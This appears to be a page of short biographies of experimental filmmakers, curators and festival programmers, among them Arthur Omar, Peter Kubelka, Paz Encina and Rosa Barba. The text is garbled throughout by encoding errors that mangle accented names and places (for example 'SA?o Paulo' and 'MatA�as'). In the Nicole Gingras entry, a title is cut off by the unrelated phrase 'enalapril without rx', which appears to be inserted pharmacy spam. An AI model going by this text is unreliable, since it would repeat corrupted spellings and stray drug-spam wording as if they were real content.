Venezuelan audiovisual designer and anthropologist, dedicated to the contemplation of imaginaries and their miscellaneous representations, the confusion and invention of memories, and the inducement of perceptive (fleeting but noble) experiences. Vila Guevara has done PhD research in documentary authorship and anthropology, and is a member of CrA?ter Collective and co-founder of the artisan film laboratory Crater-Lab. Arthur Omar is a filmmaker, photographer, plastic artist and writer. He has made significant contributions in all of the areas he has worked in, combining technological innovation with great dramatic intensity. He has participated in two editions of the SA?o Paulo Biennale, one with the photography series Anthropology of the Glorious Face, from which a book with the same name was published; and at the other with images taken in central Afghanistan, in the disaster area between Kabul and Bamiyan, which led to his most recent book Journey to Afghanistan, with a foreword by the Italian philosopher Antonio Negri. His other books include Zen and the Glorious Art of Photography, Splendor of Opposites, with 3D images. Other exhibitions include: Fractions of Light, Demons, Mirrors and Heavenly Masks, and One Gaze and Seven Veils. At the Oi Futuro Institute in Rio de Janeiro he presented Zooprisms, a set of 12 video installations, selected by the O Globo daily as the best exhibition of the year. At the VideoBrasil Festival he presented Dervixxx and The Cognitive Trilogy in circular screenings. His feature film Sad Tropic is considered a classic of Brazilian film. He has directed and produced various films for Channel Four and ZDF Arte, including the feature film Dreams and Ghost Stories. At Oi Futuro in Belo Horizonte he presented The Doors of Perception, with photographs and installations. His new book, published in September 2014, is Before Seeing, An Experiment in Image Theory, a book of photography theory with 160 previously unpublished photographs.

Carol Illanes y MatA�as Allende


MatA�as Allende and Carol Illanes have for the last three years made up a curatorial duo, directing projects that tie the history of local images with contemporary artistic production. In their exhibitions Forced History: Branches of Young Art in Chile (Sala Juan Egenau, UCH), Work in Utopia: UNCTAD III Rust (GalerA�a Macchina, UC), Inside. AndrA�s Denegri (GalerA�a Video Concreta, M100) and Sisyphus City (Museum of Contemporary Art) this relationship has been drawn through the construction of an account that engages in dialogue different works on the city, architecture and identity, mainly with video supports and installations. Both artists studied Art Theory at the University of Chile and currently belong to the Archivos group (UCH Bicentenary Project). Together they recently published the book Work in Utopia: Architectural Modernity in the Chile of the Unidad Popular.

MatA�as Allende has researched into the relationship between art and local architecture. He is currently researching for the MAC Catalogue RaisonA�e, and is on the permanent writing staff at arteycritica.org.

Carol Illanes has researched into art, politics and the public space, and currently has three projects underway related to art and the city. She is co-director of arteycritica.org.

Program Director, Ann Arbor Film Festival. David Dinnell is a filmmaker and programmer based in Ann Arbor, Michigan, USA. He has programmed for the Ann Arbor Film Festival since 2006, becoming Program Director in 2010. Previously he was the Film Programmer for the University of Wisconsin-Milwaukee Union Theatre for five seasons and was Program Director of the Media City Film Festival (Windsor, Canada) for its 11th and 12th editions. Hito Steyerl (1966, Munich, Germany) is a filmmaker who works as a director and author in the field of documentary essay film and video, media art and video installation. Lauren Howes


Lauren Howes assumed the role of Executive Director of CFMDC in September 2006. Prior to coming to CFMDC, she was the Distribution Manager of Video Out Distribution in Vancouver, BC from 2002-2006. Howes has programmed screenings of Canadian Media Art for events in Vancouver, Toronto, Dublin, Hamburg, Sao Paulo, Rio de Janeiro, Seoul and London and was selected as a Goethe Scholar to participate in the Living Archive program 2013 at Arsenal – institut fA?r film und videokunst in Berlin.
Howes currently sits on the Board of Directors at the Toronto Arts Council. She graduated from Simon Fraser University with a BFA in Film Production and endeavors to make films when possible, outside of the demands of arts administration. Lucas Bambozzi is an artist and new media researcher producing installations, single channel videos and interactive projects. His works have been shown in solo and collective shows in more than 40 countries, held by organizations such as Moma in USA, ZKM, Frankfurter Kunstverein and ISEA-Ruhr in Germany, Laboral and Arcoa��s Expanded Box in Spain, Http Gallery in London, Havana Biennale in Cuba, A�KUC gallery in Slovenia, WRO Media Art Biennale in Poland, Centre Georges Pompidou in France, ZERO1 Biennial in the USA, Bienal de Artes Mediales in Chile and many venues in Brazil, including the SA?o Paulo Biennale. He has participated in film and video festivals such as Sundance, Slamdance, FID Marseille, Videobrasil, Ita��s All True Festival, Impakt, Festival do Rio BR, Share Festival Italy, FILE, On-Off and many others. Was twice awarded prizes by the Vitae Foundation Arts Program and was acknowledged in 2012 with the prestigious Sergio Motta Prize. He is one of the initiators of the arte.mov Festival (2006-2012), the Multitude exhibition (Sesc Pompeia, SA?o Paulo, 2014) and the Labmovel project.

Luciano Zubillaga is an Argentine artist based in London. He grew up in Tucuman, Buenos Aires and Caracas, where he studied philosophy and arts. In 1993 he moved to London to study photography and filmmaking at Goldsmiths College, University of London. In 2008, Zubillaga received the London Artists’ Film and Video Awards (LAFVA). His films have been exhibited internationally in festivals and museums including Habana Film Festival, Ann Arbor Film Festival, Armory Show, BFI Southbank, Frieze Art Fair and Whitechapel Art Gallery. Zubillaga is subject leader of Experimental Film and Video at Ealing School of Art, Design and Media, University of West London.

Luis MacA�as
Artist, filmmaker, image recycler and film researcher. He is a member of CrA?ter Collective and co-founder of the artisan film laboratory Crater-Lab. His works on 8mm, Super 8 and 16mm film formats are conceived as film performance or expanded cinema projects. Artistic concerns focus on two points: physical work on cinematographic film, conceiving each piece from its specific videographic or cinematographic format, as well as the recycling and reinvention of new relationships between images in movement. These proposals are conceived for both dark room screening and white cube performance or installation. In parallel, MacA�as holds theoretical-practical workshops, specialising in different variants to experimental film, found footage, cameraless film, Super 8, artisan processes, both at film school and at art centres and museums. Nadia Seboussi is originally from Algeria. She holds a degree in Applied Communications Studies and a bachelora��s degree in Electrical Engineering from the University of Algiers. After graduating, she worked as a journalist in the French-speaking press until 2001. In 2002, she emigrated to Canada where in 2013 she earned a degree and Mastera��s in visual and multi-media art.
Nadia has been granted several scholarships and excellence awards: Pierre Ayot award in 2010, Prix FA�minin de la relA?ve, Autodesk and Jacques Excellence Prizes in 2008 and 2009 respectively. In 2010-2011, she received the excellence scholarship from the Social Sciences and Humanities Research Council of Canada. Nadia is currently a Claudine and Stephen Brofman scholar in contemporary art 2013-2015.

Nicole Gingras. Based in Montreal, Nicole is a researcher, independent curator and author. She is particularly interested in the image, be it visual, audio or textual. The exhibitions and programs she has curated and the publications under her direction, her texts as well as the seminars she has led, deal with such notions as time, the creative process, the movements of thought, traces and memory. She has collaborated with various museums, galleries, artist-run centers and festivals in Canada and abroad. In 2012, she received the Hnatyshyn Foundation Award for Curatorial Excellence in Contemporary Art. Her most recent curatorial projects include Raymond Gervais 3 x 1 (Montreal, 2011-2012), a two-part exhibition and publication focusing on a pioneer of conceptual art in Canada; Machinesa��The Shapes of Movement (Quebec City, 2012), a series of 14 exhibitions for the Manif da��art biennial; and Karen Trask a�� La��ombre et la forme (Karen Trask a�� Shadow and Form) enalapril without rx. Pablo Lobato


Pablo Lobato was born in 1976 in Bom Despacho, Brazil, and currently lives and works in Belo Horizonte, Brazil. He received a BFA from the Pontifical Catholic University of Minas Gerais, Brazil, in 1999. The artist works with different media such as cinema, photography, site-specific, sculpture and object. He was one of the creators of Teia a�� a center for audiovisual research and production headquartered in Belo Horizonte (2002-2014). His feature film Acidente was awarded best Ibero-American documentary in Guadalajara, Mexico in 2007. In 2009 he was awarded a fellowship by the John Simon Guggenheim Foundation. Lobato has exhibited his work internationally over the past ten years at film festivals such as Sundance, Locarno, Rotterdam, and group shows at New Museum in New York, Tamayo Museum of Contemporary Art in Mexico City, Museum of Modern Art in Sao Paulo, and Akademie der Kunst in Berlin. Currently his work can be found in the collections of the Museu d I?Art Contemporani de Barcelona, Sharjah Art Foundation in the United Arab Emirates, Museum of Modern Art in Rio de Janeiro, among others.

Paz Encina


Paz Encina was born in AsunciA?n, Paraguay, in 1971. She studied Cinematography at the Universidad del Cine, graduating in 2001. She has created award-winning video installations and film and video shorts. Between 2002 and 2004 she taught at various universities. In 2006 she released her first feature film Paraguayan Hammock, winning various awards, such as the Fipresci at Cannes 2006, and the Luis BuA�uel Prize for the best Ibero-American film. In 2011, commissioned by Canal Encuentro, she made the short films River Paraguay/3 Movements and for the Gulbenkian Foundation she made the award-winning short Southern Wind. In December 2012 she exhibited the installation Memory Notes for the 20th anniversary of the discovery of the Archive of Terror. Peter Kubelka is an Austrian filmmaker born in Vienna in 1934. He is also co-founder of the Osterreichisches Filmmuseum (Vienna) and Anthology Film Archives (New York), a curator, archivist, lecturer, architect, musician, collector and cook a�� the last playing such a central role in his filmic philosophy that he once added a�?and Cuisinea�? to his formal job title of Professor of Film at the Frankfurt School of Fine Arts. Peter Kubelka has influenced the history of film and its avant-garde tradition like few others. His films mark a new way of understanding the effects of cinema on history. Rosa Barba (Sicily, 1972) studied at the Academy of Media Arts in Cologne and at the Rijksakademie van Beeldende Kunsten in Amsterdam. Her work involves the use of 35mm and 16mm film to create a�?time installationsa�? and films. She is especially interested in the abstraction of cinematography as a means to push boundaries and possibilities.
